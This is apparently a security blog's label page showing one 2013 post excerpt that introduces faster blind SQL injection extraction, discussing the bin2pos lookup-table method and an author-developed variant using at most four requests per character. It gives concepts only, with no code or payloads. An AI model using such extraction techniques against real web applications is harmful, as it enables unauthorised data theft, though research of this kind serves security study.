Showing posts with label Time based SQLi. Show all posts
Showing posts with label Time based SQLi. Show all posts

Saturday, 12 October 2013

Even Faster Blind SQL injection methods

A method presented at DerbyCon and BlackHat involves extracting not the bits of the character but the bits of a characters position in a look up table which contains a number of character ascii values---more on this later. This post discusses the conceptual advantages and fundamental drawbacks of the bin2pos method and introduces a new variant I've developed which provides better stability and only requires a maximum of 4 requests per character extraction but imposes some configurational requirements to the target web server.